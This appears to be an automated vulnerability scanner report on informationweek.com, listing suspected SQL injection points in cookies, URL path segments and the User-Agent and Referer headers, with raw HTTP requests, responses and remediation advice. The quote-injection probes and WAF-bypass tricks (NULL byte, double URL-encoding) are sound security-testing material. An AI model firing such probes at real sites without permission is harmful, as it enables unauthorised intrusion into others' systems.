<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00'; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:16 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:16 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00''; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:17 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:17 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video%2527/security/68553969001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30326
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video%2527%2527/security/68553969001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video%2527%2527/security/68553969001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/68553969001' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:21:54 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:54 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30445
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security/68553969001'' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/68553969001''&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/81784308001' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:02 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:02 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30445
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security/81784308001'' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001''&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_lv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:48 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:48 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68383
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%2527%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68289
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:12 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:12 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:28 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:28 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 70366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror"> ...[SNIP]...
Request 2
GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 70361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror"> ...[SNIP]...
Request 2
GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:57 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:57 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
